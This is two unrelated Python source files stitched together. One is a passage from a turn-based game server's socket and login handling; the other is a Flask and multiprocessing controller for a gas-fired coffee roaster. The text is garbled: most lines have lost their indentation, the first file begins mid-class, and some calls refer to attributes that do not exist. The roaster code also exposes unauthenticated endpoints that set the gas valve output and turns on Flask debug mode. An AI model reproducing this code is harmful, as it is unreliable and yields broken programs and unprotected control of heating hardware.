def get_player(self, client_id):
return self.players[self.player_id2index(client_id)]
def player_connected(self, client_id):
index = self.player_id2index(client_id)
        self.connected_players[index % 2] += 1
@property
def num_log_in(self):
'''
Returns the number of people who have been logged in
'''
total = 0
for key in self.player_logged:
if self.player_logged[key]:
total += 1
return total
def verify_login(self, unpacked_data: str):
        '''
        This function verifies the login and then logs the player in,
        adding them to the game state.
        Args:
            unpacked_data: The decoded login message received from the client
        Return:
            The client id if login succeeded, an error string otherwise
        '''
client_id = int(unpacked_data['client_id'])
# Check if they are in our list of clients
if client_id not in [player['id'] for player in self.players]:
return "Client id Mismatch"
# Check if they logged in already
if self.player_logged[client_id]:
return "Already Logged In"
self.player_logged[client_id] = True
# Check if all the players are logged in and then start the game
logging.info("Player logged in: %s", self.player_logged)
if len(self.players) == self.num_log_in:
self.start_game()
return client_id
def set_player_turn(self, player_index):
self.current_player_index = player_index
self.turn_events[player_index].set()
def start_game(self):
'''
This code handles starting the game. Anything that is meant to be
triggered when a game starts is stored here.
'''
if self.terminal_viewer and sys.platform != 'win32':
# Clear the entire screen
sys.stdout.write("\033[2J")
# Init the player who starts and then tell everyone we started
self.current_player_index = 0
self.set_player_turn(self.current_player_index)
self.started = True
return
def end_turn(self):
'''
This function handles the release of all locks and moving the player to
the next turn. It also handles sleeping the docker instances.
Args:
client_id: The int of the client that this thread is related to
'''
if self.terminal_viewer:
if sys.platform == 'win32':
# Windows terminal only supports escape codes starting from Windows 10 in the 'Threshold 2' update.
# So fall back to other commands to ensure compatibility
os.system('cls')
else:
# Move the cursor to coordinate (0,0) on the screen.
                # Compared to clearing the entire screen, this reduces flicker.
# See https://en.wikipedia.org/wiki/ANSI_escape_code
sys.stdout.write("\033[0;0H")
# os.system('clear')
print('[rnd: {}] [rK: {}] [bK: {}]'.format(
self.manager.round(),
self.manager.manager_karbonite(bc.Team.Red),
self.manager.manager_karbonite(bc.Team.Blue),
))
self.manager.print_game_ansi()
if sys.platform != 'win32':
# Clear the screen from the cursor to the end of the screen.
# Just in case some text has been left over there from earlier frames.
sys.stdout.write("\033[J")
for player in sorted(self.players, key=_key):
p = player['player']
print('-- [{}{}] --'.format('e' if p.planet == bc.Planet.Earth else 'm', 'r' if p.team == bc.Team.Red else 'b'))
logs = player['logger'].logs.getvalue()[-1000:].splitlines()[-5:]
for line in logs:
print(line)
        if self.extra_delay:
            time.sleep(self.extra_delay / 1000.)
# Increment to the next player
self.current_player_index = (self.current_player_index + 1) % len(self.players)
self.set_player_turn(self.current_player_index)
def get_viewer_messages(self):
'''
A generator for the viewer messages
'''
# TODO check this works with the way the engine works
max_yield_item = 0
while not self.game_over or max_yield_item != len(self.viewer_messages):
if len(self.viewer_messages) > max_yield_item:
new_max = len(self.viewer_messages)
for i in range(max_yield_item, new_max):
yield self.viewer_messages[i]
max_yield_item = new_max
time.sleep(0.1)
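    # Hedged consumer sketch: a viewer thread can stream messages as the game
    # produces them (forward_to_viewer is a hypothetical callback):
    #
    #     for msg in game.get_viewer_messages():
    #         forward_to_viewer(msg)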
def start_turn(self, client_id: int):
'''
This is a blocking function that waits until it client_id's turn to
start the game. It attempts to take the game lock and then checks to see
if the client_id matches the next player id. If it does it returns and
the player can start running.
This also handles waking the docker instances to start computing
'''
logging.debug("Client %s: entered start turn", client_id)
player_index = self.player_id2index(client_id)
while not self.game_over:
if self.turn_events[player_index].wait(timeout=0.1):
self.turn_events[player_index].clear()
assert(self.current_player_index == player_index)
self.times[client_id] += self.time_additional
return True
return False
def make_action(self, turn_message: bc.TurnMessage, client_id: int, diff_time: float):
'''
Take action data and give it to the engine
Args:
data: the data received from the stream
'''
# get the time left of the next player to go
next_index = (self.player_id2index(client_id) + 1) % len(self.players)
next_client_id = self.players[next_index]['id']
projected_time_ms = int(1000 * (self.times[next_client_id] + self.time_additional))
# interact with the engine
application = self.manager.apply_turn(turn_message, projected_time_ms)
self.last_message = application.start_turn.to_json()
self.viewer_messages.append(application.viewer.to_json())
self.manager_viewer_messages.append(self.manager.manager_viewer_message())
self.times[client_id] -= diff_time
return
def create_receive_handler(game: Game, dockers, use_docker: bool,
is_unix_stream: bool) \
-> socketserver.BaseRequestHandler:
    '''
    Create a class that will be used as a receive handler
    Args:
        game: The game the receive handler should operate on
        dockers: A map of the docker instances for the players
        use_docker: if True sleep and wake with docker otherwise don't use
            docker. Useful for testing the socket server
        is_unix_stream: True if the underlying socket is a Unix stream socket
    Return:
        A ReceiveHandler class
    '''
class ReceiveHandler(socketserver.BaseRequestHandler):
'''
This class overrides the default handling method in socketServer, so it
calls what we want
'''
def __init__(self, *args, **kwargs):
'''
Hidden init
'''
self.game = game
self.dockers = dockers
self.client_id = 0
self.error = ""
self.logged_in = False
self.is_unix_stream = is_unix_stream
self.buffer_small = b''
self.buffer_large = []
super(ReceiveHandler, self).__init__(*args, **kwargs)
        def read_line(self):
            '''
            Read one newline-delimited message from the socket, buffering any
            partial trailing data for the next call. Raises IOError on EOF.
            '''
while True:
if self.buffer_small:
pos = self.buffer_small.find(b'\n')
if pos != -1:
ret = b''.join(self.buffer_large) + self.buffer_small[:pos]
self.buffer_small = self.buffer_small[pos+1:]
self.buffer_large = []
return ret
else:
self.buffer_large.append(self.buffer_small)
self.buffer_small = self.request.recv(4096)
if not self.buffer_small:
raise IOError("reached socket EOF before finding newline")
        def get_next_message(self) -> str:
            '''
            Returns the next newline-delimited message received over the
            socket, decoded as a string; JSON parsing is left to the caller
            Returns:
                The raw message string
            '''
recv_socket = self.request
game = self.game
logging.debug("Client %s: Waiting for next message", self.client_id)
try:
data = self.read_line()
except (StopIteration, IOError):
print("{} has not sent message for {} seconds, assuming they're dead".format(
self.game.get_player(self.client_id)['player'],
TIMEOUT
))
recv_socket.close()
if bc.Team.Red == self.game.get_player(self.client_id)['player'].team:
self.game.winner = 'player2'
elif bc.Team.Blue == self.game.get_player(self.client_id)['player'].team:
self.game.winner = 'player1'
else:
if self.game.connected_players[0] == self.game.connected_players[1]:
print("Determining match by coin toss.")
self.game.winner = 'player1' if random.random() > 0.5 else 'player2'
else:
self.game.winner = 'player1' if self.game.connected_players[0] > self.game.connected_players[1] else 'player2'
self.game.disconnected = True
self.game.game_over = True
raise TimeoutError()
except KeyboardInterrupt:
recv_socket.close()
if bc.Team.Red == self.game.get_player(self.client_id)['player'].team:
self.game.winner = 'player2'
elif bc.Team.Blue == self.game.get_player(self.client_id)['player'].team:
self.game.winner = 'player1'
else:
if self.game.connected_players[0] == self.game.connected_players[1]:
print("Determining match by coin toss.")
self.game.winner = 'player1' if random.random() > 0.5 else 'player2'
else:
self.game.winner = 'player1' if self.game.connected_players[0] > self.game.connected_players[1] else 'player2'
self.game.disconnected = True
self.game.game_over = True
raise KeyboardInterrupt()
data = data.decode("utf-8").strip()
return data
#unpacked_data = json.loads(data)
#return unpacked_data
def send_message(self, obj: object) -> None:
'''
Sends newline delimited message to socket
The object desired to be sent will be converted to a json and then encoded
and sent.
Args:
Obj: The object that wants to be serialized and sent over
Returns:
None
'''
send_socket = self.request
if isinstance(obj, bytes):
obj = obj.decode()
message = obj + "\n"
encoded_message = message.encode()
logging.debug("Client %s: Sending message %s", self.client_id,
encoded_message)
try:
self.request.sendall(encoded_message)
except IOError:
send_socket.close()
print("{} has not accepted message for {} seconds, assuming they're dead".format(
[p for p in self.game.players if p['id'] == self.client_id][0]['player'],
TIMEOUT
))
if bc.Team.Red == self.game.get_player(self.client_id)['player'].team:
self.game.winner = 'player2'
                elif bc.Team.Blue == self.game.get_player(self.client_id)['player'].team:
self.game.winner = 'player1'
else:
if self.game.connected_players[0] == self.game.connected_players[1]:
print("Determining match by coin toss.")
self.game.winner = 'player1' if random.random() > 0.5 else 'player2'
else:
self.game.winner = 'player1' if self.game.connected_players[0] > self.game.connected_players[1] else 'player2'
self.game.disconnected = True
self.game.game_over = True
raise TimeoutError()
except KeyboardInterrupt:
send_socket.close()
if bc.Team.Red == self.game.get_player(self.client_id)['player'].team:
self.game.winner = 'player2'
                elif bc.Team.Blue == self.game.get_player(self.client_id)['player'].team:
self.game.winner = 'player1'
else:
if self.game.connected_players[0] == self.game.connected_players[1]:
print("Determining match by coin toss.")
self.game.winner = 'player1' if random.random() > 0.5 else 'player2'
else:
self.game.winner = 'player1' if self.game.connected_players[0] > self.game.connected_players[1] else 'player2'
self.game.disconnected = True
self.game.game_over = True
raise KeyboardInterrupt()
return
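        # Illustrative client-side sketch (not part of the server): reading
        # and writing this newline-delimited protocol over a Unix socket.
        # The socket path and login payload shown here are assumptions for
        # the example.
        #
        #     import json, socket
        #     sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        #     sock.connect('/tmp/battlecode.sock')
        #     sock.sendall((json.dumps({'client_id': 0}) + '\n').encode())
        #     buf = b''
        #     while b'\n' not in buf:
        #         buf += sock.recv(4096)
        #     reply = json.loads(buf.split(b'\n', 1)[0].decode())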
def message(self, state_diff):
'''
Compress the current state into a message that will be sent to the
client
'''
if self.error == "":
error = "null"
else:
self.docker.destroy()
if state_diff == "":
state_diff = '""'
if isinstance(state_diff, bytes):
state_diff = state_diff.decode()
if self.logged_in:
logged_in = "true"
else:
logged_in = "false"
message = '{{"logged_in":{},"client_id":"{}","error":{},"message":{}}}'.format(logged_in, self.client_id, error, state_diff)
return message
def player_handler(self):
'''
This is the handler for socket connections from players
'''
self.logged_in = False
logging.debug("Client connected to server")
self.request.settimeout(TIMEOUT)
TIMEDOUTLOG = False
# Handle Login phase
while not self.logged_in and not self.game.game_over:
# do the json parsing ourself instead of handing it off to rust
unpacked_data = json.loads(self.get_next_message())
verify_out = self.game.verify_login(unpacked_data)
self.error = ""
if not isinstance(verify_out, int):
self.error = verify_out
logging.warning("Client failed to log in error: %s",
self.client_id)
else:
logging.info("Client %s: logged in succesfully", self.client_id)
self.logged_in = True
self.client_id = verify_out
self.game.player_connected(self.client_id)
self.game.get_player(self.client_id)['built_successfully'] = True
log_success = self.message("")
self.send_message(log_success)
if self.game.game_over:
return
logging.debug("Client %s: Spinning waiting for game to start",
self.client_id)
while not self.game.started and not self.game.game_over:
# Spin while waiting for game to start
time.sleep(0.05)
logging.info("Client %s: Game started", self.client_id)
my_sandbox = dockers[self.client_id]
running_stats = self.game.get_player(self.client_id)['running_stats']
# average time used, in seconds
atu = 0
while self.game.started and not self.game.game_over:
# This is the loop that the code will always remain in
            # Blocks until it is this client's turn
if not self.game.start_turn(self.client_id):
self.request.close()
return
if self.game.manager.is_over():
self.game.game_over = True
self.game.end_turn()
self.request.close()
return
logging.debug("Client %s: Started turn", self.client_id)
if self.game.initialized > 3:
start_turn_msg = self.message(self.game.last_message)
else:
state_diff = self.game.players[self.game.current_player_index]['start_message']
start_turn_msg = self.message(state_diff)
running_stats["lng"] = my_sandbox.guess_language()
running_stats["bld"] = False
if self.game.initialized <= 3:
my_sandbox.unpause()
self.send_message(start_turn_msg)
self.game.initialized += 1
self.game.end_turn()
continue
if self.game.times[self.client_id] > 0:
my_sandbox.unpause()
start_time = time.perf_counter()
start_time_python = time.process_time()
self.send_message(start_turn_msg)
data = self.get_next_message()
end_time_python = time.process_time()
end_time = time.perf_counter()
diff_time = (end_time - start_time) - (end_time_python - start_time_python)
my_sandbox.pause()
try:
sent_message = bc.SentMessage.from_json(data)
except Exception as e:
print("Error deserializing JSON")
print(e)
print("Killing player...")
if bc.Team.Red == self.game.get_player(self.client_id)['player'].team:
self.game.winner = 'player2'
                        elif bc.Team.Blue == self.game.get_player(self.client_id)['player'].team:
self.game.winner = 'player1'
else:
if self.game.connected_players[0] == self.game.connected_players[1]:
print("Determining match by coin toss.")
self.game.winner = 'player1' if random.random() > 0.5 else 'player2'
else:
self.game.winner = 'player1' if self.game.connected_players[0] > self.game.connected_players[1] else 'player2'
self.game.disconnected = True
self.game.game_over = True
assert int(sent_message.client_id) == self.client_id, \
"Wrong client id: {}, should be: {}".format(sent_message.client_id, self.client_id)
turn_message = sent_message.turn_message
else:
if not TIMEDOUTLOG:
TIMEDOUTLOG = True
self.game.players[self.game.current_player_index]['logger'](b'PLAYER HAS TIMED OUT!!!')
# 1 second; never let them play again
diff_time = 1
turn_message = bc.TurnMessage.from_json('{"changes":[]}')
atu = atu * .9 + diff_time * .1
# convert to ms
running_stats["tl"] = int(self.game.times[self.client_id] * 1000)
running_stats["atu"] = int(atu * 1000)
self.game.make_action(turn_message, self.client_id, diff_time)
self.game.end_turn()
def viewer_handler(self):
'''
This handles the connection to the viewer
'''
for message in self.game.get_viewer_messages():
# TODO check this schema works for the viewer
self.send_message(message)
def handle(self):
'''
            This does all the processing of the data we receive; we spend our
            time in this function.
'''
if self.is_unix_stream:
try:
self.player_handler()
except TimeoutError:
return
else:
self.viewer_handler()
return ReceiveHandler
def start_server(sock_file: str, game: Game, dockers, use_docker=True) -> socketserver.BaseServer:
'''
Start a socket server for the players to connect to
Args:
        sock_file: the name of the file that will be used as the Unix stream
                   socket, or a (host, port) tuple for TCP
        game: The game information that is being run
        use_docker bool: whether to use docker or not
    Return:
        server: The socket server, so it can be closed by parent functions
        at the appropriate time
'''
    # Create handler for managing each connection to the server
receive_handler = create_receive_handler(game, dockers, use_docker, True)
if isinstance(sock_file, tuple):
# tcp port
server = socketserver.ThreadingTCPServer(sock_file, receive_handler)
else:
server = socketserver.ThreadingUnixStreamServer(sock_file, receive_handler)
def wait_for_connections():
time.sleep(BUILD_TIMEOUT)
for player in game.players:
if not player['built_successfully']:
print('Player failed to connect to manager after',BUILD_TIMEOUT,'seconds:', player['player'])
if bc.Team.Red == player['player'].team:
game.winner = 'player2'
else:
game.winner = 'player1'
game.disconnected = True
game.game_over = True
server_thread = threading.Thread(target=server.serve_forever, daemon=True)
logging.info("Server Started at %s", sock_file)
server_thread.start()
waiter_thread = threading.Thread(target=wait_for_connections, daemon=True)
waiter_thread.start()
return server
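# Usage sketch (illustrative; constructing `game` and `dockers` happens
# elsewhere in the match runner):
#
#     server = start_server('/tmp/battlecode.sock', game, dockers)
#     ...  # run the match
#     server.shutdown()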
def start_viewer_server(port: int, game: Game) -> socketserver.BaseServer:
'''
    Start a socket server for the viewer to connect to
    Args:
        port: port to connect to viewer on
        game: The game information that is being run
    Return:
        server: The socket server, so it can be closed by parent functions
        at the appropriate time
'''
    # Create handler for managing each connection to the server
receive_handler = create_receive_handler(game, {}, False, False)
# Start server
server = socketserver.ThreadingTCPServer(('localhost', port), receive_handler)
server_thread = threading.Thread(target=server.serve_forever, daemon=True)
server_thread.start()
return server
|
bigroaster.py
|
#!/usr/bin/python
# -*- coding: iso-8859-15 -*-
#
# Copyright (c) 2017-2018 Mark Juric
# Copyright (c) 2012-2015 Stephen P. Smith
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
# IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import time, random, os
import sys
from flask import Flask, render_template, request, jsonify, json
import xml.etree.ElementTree as ET
import Roaster
from multiprocessing import Queue, Pipe, Process, current_process
from Queue import Full
from pid import pidpy as PIDController
import logging
from logging.handlers import RotatingFileHandler
global paramConn # pipe between tempControlProc and web server for passing POST'd params
global myRoasterObj
roastTime = 0
posted = False
statusQ = None # Queue to pass temp readings and settings between browser and us
tempQueue = Queue(2) # Queue to pass temp sensor data between tempControlProc and us
DEBUG = 0
app = Flask(__name__, template_folder='templates')
#Parameters that are used in the temperature control process
class param:
status = {
"tempSensors" : [],
"gasValve" : [],
"temp" : "0",
"tempUnits" : "F",
"elapsed" : "0",
"mode" : "off",
"sampleTime" : 2.0,
"gasOutput" : 0.0,
"set_point" : 0.0,
"num_pnts_smooth" : 5,
# "k_param" : 44,
# "i_param" : 165,
# "d_param" : 4
"k_param" : 1.2,
"i_param" : 1,
"d_param" : 0.001,
"sampleRate" : 500,
"checkInRate" : 20,
"roasterRotation" : 0,
"roasterTilt" : 0,
"roasterFullness" : 50,
}
roast = {
"ambient" : { "ramp": '', "finaltemp": 70, "time": '' },
"drying" : { "ramp": '', "finaltemp": '', "time": '' },
"development" : { "ramp": '', "finaltemp": '', "time": '' },
"finish" : { "ramp": '', "finaltemp": 267, "time": '' },
}
config = {
"tempUnits" : "F",
"template": '',
"rootDir": '',
"roasterId": -1,
"servoId": -1,
"servoDriver": '',
"servoDelay": 0.1,
"servoStepPin": -1,
"servoDirPin": -1,
"servoMS1Pin": -1,
"servoMS2Pin": -1,
"servoHomePin": -1,
"servoSteps": -1,
"servoStepsPer": -1,
"valveMaxTurns": -1,
"valveSafeLow": -1,
}
# main web page
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'GET':
#render main page
print param.status
return render_template(template_name, mode = param.status["mode"], set_point = param.status["set_point"], \
gasOutput = param.status["gasOutput"], sampleTime = param.status["sampleTime"], \
k_param = param.status["k_param"], i_param = param.status["i_param"], \
d_param = param.status["d_param"], \
tempSensors = param.status["tempSensors"], gasValve = param.status["gasValve"],\
sampleRate = param.status["sampleRate"], checkInRate = param.status["checkInRate"],\
ambient_finaltemp = param.roast["ambient"]["finaltemp"],\
drying_ramp = param.roast["drying"]["ramp"],\
drying_finaltemp = param.roast["drying"]["finaltemp"],\
drying_time = param.roast["drying"]["time"],\
development_ramp = param.roast["development"]["ramp"],\
development_finaltemp = param.roast["development"]["finaltemp"],\
development_time = param.roast["development"]["time"],\
finish_ramp = param.roast["finish"]["ramp"],\
finish_finaltemp = param.roast["finish"]["finaltemp"],\
finish_time = param.roast["finish"]["time"])
else:
return 'OK'
#post roasting profiles
@app.route('/postprofile', methods=['POST'])
def postprofile():
if request.json is not None:
param.roast = request.json
for val in request.form:
print val, " ", request.form[val]
print "ME SHARTS!"
return 'OK'
# make sure our temp board is doing what we want
@app.route('/checkin', methods=['GET'])
def checkin():
return jsonify({"sampleRate": str(param.status["sampleRate"]), "checkInRate": str(param.status["checkInRate"])})
# check-in with the temperature probe
@app.route('/postsensors', methods=['POST'])
def postsensors():
global posted
content = request.get_json()
if not posted:
initialize(content)
posted = True
if tempQueue.full():
print "Queue full. Scrapping data"
tempQueue.get()
tempQueue.put(content)
print "Posting to tempQueue: ", content, " and now queue length is ", tempQueue.qsize()
return 'JSON posted'
#post params (selectable temp sensor number)
@app.route('/postparams/<sensorNum>', methods=['POST'])
def postparams(sensorNum=None):
global paramConn
param.status["mode"] = request.form["mode"]
param.status["set_point"] = float(request.form["setpoint"])
param.status["gasOutput"] = float(request.form["dutycycle"]) #is boil duty cycle if mode == "boil"
param.status["sampleTime"] = float(request.form["cycletime"])
param.status["num_pnts_smooth"] = int(request.form.get("numPntsSmooth", param.status["num_pnts_smooth"]))
param.status["k_param"] = float(request.form["k"])
param.status["i_param"] = float(request.form["i"])
param.status["d_param"] = float(request.form["d"])
#send to main temp control process
#if did not receive variable key value in POST, the param class default is used
paramConn.send(param.status)
return 'OK'
#get status from roaster
@app.route('/getstatus') #only GET
def getstatus(roasterNum=1):
global statusQ
# blocking receive - current status
print "param.status: ", param.status
try:
param.status = statusQ.get(timeout=param.status["sampleRate"]/1000.0)
    except Exception:
pass
return jsonify(**param.status)
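# Illustrative poll of the status endpoint (assumes the app runs on the
# default Flask port 5000 and that `requests` is available; neither is
# used elsewhere in this file):
#
#     import requests
#     status = requests.get('http://localhost:5000/getstatus').json()
#     print status["temp"], status["mode"]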
def initialize(sensorPost):
global statusQ
global paramConn
# We've never checked in before. Do some work
## Is it possible to change this on the fly? Do we care?
numSensors = len(sensorPost["probes"])
param.status["tempSensors"] = []
param.status["tempUnits"] = param.config["tempUnits"]
# Look for roasters
myRoasterObj = Roaster.Roaster(param.config["roasterId"])
for i in range(numSensors):
tempSensorId = sensorPost["probes"][i]["number"]
myRoasterObj.addTempSensor(tempSensorId,str(tempSensorId),"MAX31855","hardware")
#myRoasterObj.addTempSensor(tempSensorId)
param.status["tempSensors"].append([tempSensorId,str(tempSensorId),0])
# grab our gas servo
servoId = param.config["servoId"]
driver = param.config["servoDriver"]
delay = param.config["servoDelay"]
step = param.config["servoStepPin"]
direction = param.config["servoDirPin"]
ms1 = param.config["servoMS1Pin"]
ms2 = param.config["servoMS2Pin"]
home = param.config["servoHomePin"]
steps = param.config["servoSteps"]
stepsPer = param.config["servoStepsPer"]
# get our valve info
maxTurns = param.config["valveMaxTurns"]
safeLow = param.config["valveSafeLow"]
param.status["gasValve"] = [servoId,safeLow,0]
myRoasterObj.addGasServo(servoId,driver,delay,step,direction,ms1,ms2,home,maxTurns,safeLow,steps,stepsPer)
myGasServo = myRoasterObj.getGasServo()
statusQ = Queue(2) # blocking queue
paramConn, childParamConn = Pipe()
p = Process(name = "tempControlProc", target=tempControlProc, args=(tempQueue, myRoasterObj, param.status, childParamConn))
p.start()
myGasServo.home()
def getRoastTime():
return (time.time() - roastTime)
# Stand Alone Heat Process using GPIO
def heatProcGPIO(conn, sampleTime, gasOutput, myGasServo):
p = current_process()
print('Starting:', p.name, p.pid)
while (True):
while (conn.poll()): #get last
sampleTime, gasOutput = conn.recv()
myGasServo.setGasOutput(gasOutput)
conn.send([sampleTime, gasOutput])
time.sleep(sampleTime)
def unPackParamInitAndPost(paramStatus):
#temp = paramStatus["temp"]
tempUnits = paramStatus["tempUnits"]
#elapsed = paramStatus["elapsed"]
mode = paramStatus["mode"]
sampleTime = paramStatus["sampleTime"]
gasOutput = paramStatus["gasOutput"]
set_point = paramStatus["set_point"]
num_pnts_smooth = paramStatus["num_pnts_smooth"]
k_param = paramStatus["k_param"]
i_param = paramStatus["i_param"]
d_param = paramStatus["d_param"]
return tempUnits, mode, sampleTime, gasOutput, set_point, num_pnts_smooth, \
k_param, i_param, d_param
def packParamGet(temp, tempUnits, elapsed, mode, sampleTime, gasOutput, set_point, \
num_pnts_smooth, k_param, i_param, d_param, tempSensors, gasValve, rotation):
param.status["temp"] = temp
param.status["tempUnits"] = tempUnits
param.status["elapsed"] = elapsed
param.status["mode"] = mode
param.status["sampleTime"] = sampleTime
param.status["gasOutput"] = gasOutput
param.status["set_point"] = set_point
param.status["num_pnts_smooth"] = num_pnts_smooth
param.status["k_param"] = k_param
param.status["i_param"] = i_param
param.status["d_param"] = d_param
param.status["tempSensors"] = tempSensors
param.status["gasValve"] = gasValve
param.status["roasterRotation"] = rotation
return param.status
# Main Temperature Control Process
def tempControlProc(tempQ, myRoaster, paramStatus, childParamConn):
oldMode = ''
tempUnits, mode, sampleTime, gasOutput, set_point, num_pnts_smooth, \
k_param, i_param, d_param = unPackParamInitAndPost(paramStatus)
oldMode = mode
p = current_process()
print('Starting:', p.name, p.pid)
# Pipe to communicate with "Heat Process"
parentHeat, c = Pipe()
# Start Heat Process
# Fix this. What do sampleTime and gasOutput do here?
pheat = Process(name = "heatProcGPIO", target=heatProcGPIO, args=(c, sampleTime, gasOutput, myRoaster.getGasServo()))
pheat.daemon = True
pheat.start()
# Get our PID ready
readyPIDcalc = False
# Temperature smoothing list
tempMovingAverageList = []
tempMovingAverage = 0.0
slopeMovingAverageList = []
slopeMovingAverage = 0.0
while(True):
readytemp = False
tempSensorsParam = []
gasServoParam = []
while not tempQ.empty():
try:
sensorInfo = tempQ.get()
            except Exception:
                print "tempQ was empty even when we said it wasn't. WTF."
                continue
# This loop is not done. In here is where we have to figure out
# which probe to pay attention to.
# Rotation applies to probe 1.
# Face down: π
# Face up: 0..2*π
# Battery side (esp8266 up): π/2
# Back side (esp8266 up): 1.5*π
rotation = sensorInfo["position"]["rotation"]
for sensor in sensorInfo["probes"]:
temp_C = sensor["temp"]
elapsed = sensor["elapsed"] / 1000.0
tempSensorNum = sensor["number"]
if temp_C == -99:
print("Bad Temp Reading - retry")
continue
if (tempUnits == 'F'):
temp = (9.0/5.0)*temp_C + 32
else:
temp = temp_C
temp_str = "%3.2f" % temp
readytemp = True
tempSensorsParam.append([tempSensorNum,tempSensorNum,temp_str])
if readytemp == True:
if mode == "auto":
tempMovingAverageList.append({"temp":temp,"timestamp":time.time()})
# smooth data
tempMovingAverage = 0.0 # moving avg init
slopeMovingAverage = 0.0
while (len(tempMovingAverageList) > num_pnts_smooth):
tempMovingAverageList.pop(0) # remove oldest elements in list
while (len(slopeMovingAverageList) > num_pnts_smooth-1):
slopeMovingAverageList.pop(0) # slopeMovingAverage is one less because it's a diff
for temp_pnt in tempMovingAverageList:
tempMovingAverage += temp_pnt["temp"]
tempMovingAverage /= len(tempMovingAverageList)
# Now, compute the moving average of the slope
# We need at least two values to compute a difference
if len(tempMovingAverageList) > 1:
i = 0
while i < len(tempMovingAverageList)-1:
diff = tempMovingAverageList[i+1]["temp"] - tempMovingAverageList[i]["temp"]
slope = diff / (tempMovingAverageList[i+1]["timestamp"] - tempMovingAverageList[i]["timestamp"])
                        slopeMovingAverage += slope
                        i += 1
                    # average over the len-1 successive differences
                    slopeMovingAverage /= (len(tempMovingAverageList) - 1)
# print "len(tempMovingAverageList) = %d" % len(tempMovingAverageList)
# print "Num Points smooth = %d" % num_pnts_smooth
# print "tempMovingAverage = %.2f" % tempMovingAverage
# print tempMovingAverageList
# calculate PID every cycle
if (readyPIDcalc == True):
gasOutput = pid.calcPID_reg4(slopeMovingAverage, set_point, True)
# send to heat process every cycle
if not oldMode == mode:
myRoaster.getGasServo().setToSafeLow()
print "%s changing to %s" %(oldMode,mode)
oldMode = mode
parentHeat.send([sampleTime, gasOutput])
readyPIDcalc = False
gasServoParam = [myRoaster.getGasServo().getServoId(),myRoaster.getGasServo().getSafeLow(),gasOutput]
# put current status in queue
try:
paramStatus = packParamGet(temp_str, tempUnits, elapsed, mode, sampleTime, gasOutput, \
set_point, num_pnts_smooth, k_param, i_param, d_param,tempSensorsParam, gasServoParam, rotation)
statusQ.put(paramStatus) #GET request
except Full:
pass
while (statusQ.qsize() >= 2):
statusQ.get() #remove old status
logdata(tempSensorNum, temp, gasOutput)
if DEBUG:
print("Current Temp: %3.2f deg %s, Heat Output: %3.1f%%" \
% (temp, tempUnits, gasOutput))
while parentHeat.poll(): # Poll Heat Process Pipe
sampleTime, gasOutput = parentHeat.recv() #non blocking receive from Heat Process
readyPIDcalc = True
# Pick up any environment changes
readyPOST = False
while childParamConn.poll(): #POST settings - Received POST from web browser or Android device
paramStatus = childParamConn.recv()
tempUnits, mode, sampleTime, gasOutput_temp, set_point, num_pnts_smooth, \
k_param, i_param, d_param = unPackParamInitAndPost(paramStatus)
readyPOST = True
if readyPOST == True:
if mode == "auto":
print("auto selected")
pid = PIDController.pidpy(sampleTime, k_param, i_param, d_param) #init pid
gasOutput = pid.calcPID_reg4(tempMovingAverage, set_point, True)
# always zero out to lowest safe low before enabled modes
if not oldMode == mode:
myRoaster.getGasServo().setToSafeLow()
parentHeat.send([sampleTime, gasOutput])
if mode == "manual":
print("manual selected (%s and %s)" % (oldMode,mode))
gasOutput = gasOutput_temp
# always zero out to lowest safe low before enabled modes
if not oldMode == mode:
print "setting to safeLow"
myRoaster.getGasServo().setToSafeLow()
parentHeat.send([sampleTime, gasOutput])
if mode == "off":
print("off selected")
# We don't care. Off is off. Always set to off.
myRoaster.getGasServo().setOff()
oldMode = mode
readyPOST = False
time.sleep(0.01)
def logdata(tank, temp, heat):
f = open("roasting" + str(tank) + ".csv", "ab")
if sys.version_info >= (3, 0):
f.write("%3.1f;%3.3f;%3.3f\n".encode("utf8") % (getRoastTime(), temp, heat))
else:
f.write("%3.1f;%3.3f;%3.3f\n" % (getRoastTime(), temp, heat))
f.close()
if __name__ == '__main__':
roastTime = time.time()
# Load up our config
tree = ET.parse('config.xml')
xml_root = tree.getroot()
template_name = xml_root.find('Template').text.strip()
root_dir_elem = xml_root.find('RootDir')
if root_dir_elem is not None:
param.config["rootDir"] = root_dir_elem.text.strip()
os.chdir(param.config["rootDir"])
else:
print("No RootDir tag found in config.xml, running from current directory")
# Retrieve root element from config.xml for parsing
param.config["tempUnits"] = xml_root.find('Temp_Units').text.strip()
# Look for roasters
for roasters in xml_root.iter('Roasters'):
print ("found roasters")
for roaster in roasters:
param.config["roasterId"] = roaster.find('Roaster_Id').text
# grab our gas servo
servo = roaster.find('Servo')
param.config["servoId"] = servo.find('Servo_Id').text
param.config["servoDriver"] = servo.find('Servo_Driver').text
param.config["servoDelay"] = float(servo.find('Servo_Delay').text)
param.config["servoStepPin"] = int(servo.find('Step_Pin').text)
param.config["servoDirPin"] = int(servo.find('Dir_Pin').text)
param.config["servoMS1Pin"] = int(servo.find('MS1_Pin').text)
param.config["servoMS2Pin"] = int(servo.find('MS2_Pin').text)
param.config["servoHomePin"] = int(servo.find('Home_Pin').text)
param.config["servoSteps"] = servo.find('Step').text
param.config["servoStepsPer"] = int(servo.find('Steps_Per_Rotation_Full').text)
# get our valve info
valve = roaster.find('Valve')
param.config["valveMaxTurns"] = int(valve.find('Max_Turns_Ceil').text)
param.config["valveSafeLow"] = int(valve.find('Safe_Low_Percent').text)
logger = logging.getLogger('werkzeug')
handler = logging.FileHandler('access.log')
logger.addHandler(handler)
app.debug = True
